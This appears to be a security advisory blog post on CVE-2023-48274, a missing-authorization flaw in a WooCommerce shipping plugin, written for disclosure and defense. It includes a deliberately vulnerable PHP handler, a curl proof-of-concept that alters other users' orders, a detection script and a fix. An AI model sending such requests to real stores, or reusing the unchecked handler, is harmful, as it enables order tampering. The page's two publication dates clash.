*Published: June 2024*
What is CVE-2023-48274?
CVE-2023-48274 is a Missing Authorization vulnerability (CWE-862) in the Mondial Relay plugin for WooCommerce (WCMultiShipping), affecting versions up to and including 2.3.5. The plugin exposes shipping-related AJAX actions without checking that the caller is allowed to perform them, so an attacker can read and modify shipping data on orders that are not theirs. The root cause is not a configuration mistake but missing access-control checks in the plugin's own code.
If you run a WooCommerce store with this plugin and have not updated past version 2.3.5, you are exposed. An attacker could exploit the flaw to:
- Alter shipping data on arbitrary orders and so disrupt order processing
Let’s break it all down with details, proof-of-concept code, and practical advice.
The Vulnerability: In Simple Terms
The WCMultiShipping plugin manages shipping options (such as Mondial Relay pickup points) for WooCommerce orders. The problem is that some of its AJAX actions never check whether the current user is allowed to perform them.
In technical terms: the plugin registers handlers with add_action( 'wp_ajax_{action}', ... ) but does not verify, inside those handlers, that the caller holds the necessary capability or owns the order being modified. Keep in mind that a wp_ajax_{action} hook fires for any logged-in user, whatever their role, and a wp_ajax_nopriv_{action} hook fires for anonymous visitors; having a session cookie is authentication, not authorization.
Here is a simplified, illustrative example modelled on the reported issue (not the plugin's actual code):
// Inside a plugin file, say wcms-ajax.php (illustrative names)
add_action( 'wp_ajax_wcms_add_pickup_point', 'wcms_add_pickup_point' );
function wcms_add_pickup_point() {
    // Attacker-controlled values: no nonce check, no sanitization.
    $point_id = $_POST['point_id'];
    $order_id = $_POST['order_id'];
    // Writes to whatever order the caller names; no capability or ownership check.
    update_post_meta( $order_id, '_wcms_relay_point', $point_id );
    wp_send_json_success( array( 'message' => 'Pickup point added.' ) );
}
There is no authentication or authorization check anywhere in the handler:
- Any logged-in user, including a self-registered customer, can call this AJAX action and change shipping data for ANY order; if the same callback is also hooked to wp_ajax_nopriv_, so can an anonymous visitor.
How Can an Attacker Exploit It?
An attacker sends a crafted HTTP POST request to the site's /wp-admin/admin-ajax.php endpoint, invoking the vulnerable AJAX action (action=wcms_add_pickup_point). They only need valid order IDs, and WooCommerce order IDs are sequential integers, so they are trivial to enumerate.
Exploit PoC (Proof-of-Concept)
Suppose the site lives at https://vuln-site.com. Here is an example POST request using curl (it could equally be sent from JavaScript, Postman, etc.):
curl -X POST https://vuln-site.com/wp-admin/admin-ajax.php \
    -d 'action=wcms_add_pickup_point' \
    -d 'order_id=1234' \
    -d 'point_id=BOGUS_PICKUP'
Result: the plugin assigns the pickup point 'BOGUS_PICKUP' to order 1234, regardless of whether the sender has anything to do with that order. If the action is hooked only to wp_ajax_ (not wp_ajax_nopriv_), the attacker must attach the cookies of any logged-in session, for example a customer account they registered themselves, using curl's -b option; without a session, admin-ajax.php simply returns 0 and the handler never runs.
Why Does This Happen?
- The plugin developers did not require any user capability for the action (administrator, shop_manager, or, for a customer-facing action, at least ownership of the order in question).
- They checked neither user capabilities nor nonces. A nonce check (check_ajax_referer()) stops cross-site request forgery but is not authorization; a handler that writes to an order needs both.
- The usual pattern, current_user_can( 'manage_woocommerce' ) before any write, is entirely missing.
Fix and Mitigation
Are you vulnerable?
- Check Plugins in your WordPress dashboard. If WCMultiShipping is installed at version 2.3.5 or older, you are vulnerable.
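The version check only tells you about this one plugin. As an added example (not code from the article or from the plugin), the Python script below audits any plugin's PHP source for the same pattern: every wp_ajax_ / wp_ajax_nopriv_ action registered with add_action() is mapped to its handler, and the handler body is checked for a capability check and a nonce check. The PHP embedded in it is constructed for the demonstration (the simplified vulnerable handler from this article, also hooked for anonymous visitors, next to a hardened one); the marker lists and risk ratings are this script's own heuristics, and it only follows plain string callbacks, so class-method or closure callbacks still need manual review.

```python
"""Heuristic audit of WordPress AJAX handlers for missing authorization checks.

Added example: scans PHP source text for add_action( 'wp_ajax_*', 'callback' )
registrations and reports which handlers lack a capability or nonce check.
"""
import re
import sys
from typing import Dict, Optional

# Constructed sample: the article's simplified vulnerable handler (here also
# reachable by anonymous visitors) beside a hardened handler.
SAMPLE_PLUGIN_SOURCE = r"""<?php
add_action( 'wp_ajax_wcms_add_pickup_point', 'wcms_add_pickup_point' );
add_action( 'wp_ajax_nopriv_wcms_add_pickup_point', 'wcms_add_pickup_point' );
function wcms_add_pickup_point() {
    $point_id = $_POST['point_id'];
    $order_id = $_POST['order_id'];
    update_post_meta( $order_id, '_wcms_relay_point', $point_id );
    wp_send_json_success( array( 'message' => 'Pickup point added.' ) );
}

add_action( 'wp_ajax_wcms_list_points', 'wcms_list_points' );
function wcms_list_points() {
    check_ajax_referer( 'wcms_points', 'nonce' );
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'Unauthorized.' ), 403 );
    }
    wp_send_json_success( array() );
}
"""

# add_action( 'wp_ajax_<action>', '<callback>' ), with an optional nopriv_ prefix.
# Only plain string callbacks are matched (a limitation of this heuristic).
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([A-Za-z0-9_]+)['"]\s*,\s*['"]([A-Za-z0-9_]+)['"]"""
)

# Authorization (who may do this) versus CSRF protection (did the user intend it).
CAPABILITY_MARKERS = ("current_user_can(", "is_user_logged_in(", "user_can(")
NONCE_MARKERS = ("check_ajax_referer(", "check_admin_referer(", "wp_verify_nonce(")


def function_body(source: str, name: str) -> Optional[str]:
    """Return the brace-delimited body of `function name(...)`, or None if absent."""
    match = re.search(r"function\s+" + re.escape(name) + r"\s*\(", source)
    if not match:
        return None
    start = source.find("{", match.end())
    if start == -1:
        return None
    depth = 0
    for pos in range(start, len(source)):
        if source[pos] == "{":
            depth += 1
        elif source[pos] == "}":
            depth -= 1
            if depth == 0:
                return source[start : pos + 1]
    return None


def audit_ajax_handlers(source: str) -> Dict[str, dict]:
    """Map each wp_ajax action to what its handler checks, plus a risk rating."""
    findings: Dict[str, dict] = {}
    for nopriv, action, callback in HOOK_RE.findall(source):
        entry = findings.setdefault(action, {
            "callback": callback,
            "unauthenticated": False,   # hooked via wp_ajax_nopriv_
            "capability_check": False,
            "nonce_check": False,
        })
        entry["unauthenticated"] = entry["unauthenticated"] or bool(nopriv)
        # Drop whitespace so `current_user_can (` and `current_user_can(` both match.
        compact = re.sub(r"\s+", "", function_body(source, callback) or "")
        entry["capability_check"] = any(m in compact for m in CAPABILITY_MARKERS)
        entry["nonce_check"] = any(m in compact for m in NONCE_MARKERS)
    for entry in findings.values():
        if not entry["capability_check"]:
            # A nonce alone is CSRF protection, not authorization.
            entry["risk"] = "high" if entry["unauthenticated"] else "medium"
        elif not entry["nonce_check"]:
            entry["risk"] = "low"
        else:
            entry["risk"] = "ok"
    return findings


if __name__ == "__main__":
    # Audit the PHP file given as the only argument, else the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_PLUGIN_SOURCE
    for action, f in audit_ajax_handlers(text).items():
        print(f"{f['risk']:6} {action} -> {f['callback']}() "
              f"nopriv={f['unauthenticated']} capability={f['capability_check']} "
              f"nonce={f['nonce_check']}")
```

Run it with the path to a plugin's PHP file as its only argument. A "high" rating means the action is reachable without logging in and its handler performs no capability check; "medium" means any logged-in user, including a customer, can reach it unchecked. Treat the result as a shortlist for manual review, not a verdict: a handler may delegate its checks to a helper the regex cannot see.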
Update!
Upgrade the WCMultiShipping plugin to a version later than 2.3.5 (the latest available) immediately.
Restrict Admin-Ajax
Block or limit access to /wp-admin/admin-ajax.php for anonymous users. This helps only if the vulnerable action is reachable through wp_ajax_nopriv_; it does nothing against a logged-in customer, and it may break front-end features of other plugins that rely on admin-ajax.php.
Until you can update, add a nonce check and a capability check at the top of the vulnerable handler (the nonce action name below is illustrative; the calling JavaScript must send the matching nonce):
function wcms_add_pickup_point() {
    // CSRF protection: reject requests that do not carry a valid nonce.
    check_ajax_referer( 'wcms_pickup_point', 'nonce' );
    // Authorization: only users allowed to manage the shop may change an order.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'Unauthorized.' ), 403 ); // exits
    }
    // Validate input before it reaches the database.
    $order_id = absint( $_POST['order_id'] ?? 0 );
    $point_id = sanitize_text_field( wp_unslash( $_POST['point_id'] ?? '' ) );
    // ... original code, using the validated $order_id and $point_id ...
}
If customers are meant to choose their own pickup point at checkout, manage_woocommerce is too strict and would break that flow; in that case check instead that the order belongs to the current user (for example, compare wc_get_order( $order_id )->get_customer_id() with get_current_user_id()) before writing anything.
References and More Reading
- Official Plugin Page – WCMultiShipping
- Mondial Relay for WooCommerce
- CVE Details & Tracking *(link updates as published)*
- WordPress Plugin Security Best Practices
Final Thoughts
This vulnerability is a sharp reminder: always check user permissions and input in your plugins or themes. If you run any plugin handling orders, customers, or shipping—update, audit, and stay safe.
Found this useful? Please share with other WooCommerce store owners!
*Disclaimer: This information is for educational awareness and defensive purposes only. Do not exploit vulnerabilities on any system without permission!*
Timeline
Published on: 12/09/2024 13:15:32 UTC